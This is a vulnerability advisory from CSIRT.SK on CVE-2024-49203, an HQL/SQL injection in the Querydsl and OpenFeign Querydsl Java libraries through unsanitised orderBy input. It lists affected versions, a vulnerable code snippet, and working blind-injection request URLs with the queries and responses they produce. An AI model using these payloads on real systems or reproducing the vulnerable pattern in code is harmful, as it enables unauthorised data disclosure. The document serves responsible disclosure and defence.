Querydsl and OpenFeign Querydsl Java Library Vulnerability Permits SQL/HQL Injection

Security analysts of CSIRT.SK discovered  vulnerability CVE-2024-49203 in Querydsl and OpenFeign Querydsl library for Java, which allows attackers to perform SQL/HQL injection attacks.

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Vulnerable systems:

  • querydsl-jpa – 5.1.0
  • querydsl-apt – 5.1.0
  • hibernate-core – 6.1.1.Final
  • jakarta.persistence-api – 3.1.0
  • postgresql – 42.7.4
  • OpenFeign querydsl – 6.8

These versions are confirmed to be vulnerable. We cannot exclude other versions as vulnerable, since these were not tested.



The vulnerability exists in the newest version of Querydsl (and OpenFeign Querydsl) library, and stems from the absence of sanitization of user input, which is processed by orderBy(OrderSpecifier order) function. This method is used for sorting of database query results. In case when the order variable is generated by user input, it is possible to perform HQL queries via this variable.

If the following lines are present in code:

OrderSpecifier order = new OrderSpecifier(Order.ASC, pathBuilder.get(orderBy));
JPAQuery<Test> orderedQuery = query.orderBy(order);
return orderedQuery.fetch();

where orderBy value is given by user, the application is vulnerable.

When a user visits the following site:

http://localhost:8000/products?orderBy=name+INTERSECT+SELECT+t+FROM+Test+t+WHERE+(SELECT+'2')='2'+ORDER+BY+t.id HTTP/1.1

they can perform so called blind SQL injection, when they insert their SQL query in place of SELECT+’2′ and try what is the value of the result of the SQL query by replacing ‘2’ for all possible values.

In our case the following query is generated:

SELECT t1 FROM Test t1 Order By t1.name INTERSECT SELECT t FROM Test t WHERE (SELECT '2')='2' ORDER BY t.id ASC

In our case an attacker would obtain all the values present in the table ‘Test’, since (SELECT+’2′)=’2‘ is evaluated as True. Thus, intersection of all the elements in the tables ‘Test t1’, and ‘Test t’ is made, which is equal to all elements in the table ‘Test’.

The response would thus be as follows:

HTTP/1.1 200
Content-Type: application/json
Date: Tue, 08 Oct 2024 13:34:57 GMT
Content-Length: 27


If we visit the following page:

http://localhost:8000/products?orderBy=name+INTERSECT+SELECT+t+FROM+Test+t+WHERE+(SELECT+'1')='2'+ORDER+BY+t.id HTTP/1.1

where the condition in WHERE clause is evaluated as False, we obtain the following response:

HTTP/1.1 200
Content-Type: application/json
Date: Tue, 08 Oct 2024 13:36:30 GMT
Content-Length: 2


The vulnerability was tested using the following library versions:

  • querydsl-jpa – 5.1.0
  • querydsl-apt – 5.1.0
  • hibernate-core – 6.1.1.Final
  • jakarta.persistence-api – 3.1.0
  • postgresql – 42.7.4
  • OpenFeign querydsl – 6.8

We informed the authors of the library about the vulnerability on November 9th 2024.

Possible damages:

  • Information disclosure
  • Denial of service


If you use Querydsl (or OpenFeign Querydsl) library for development of your Java web application, and you use orderBy method with user input, we recommend additional treatment of user input within the best practice of secure development.


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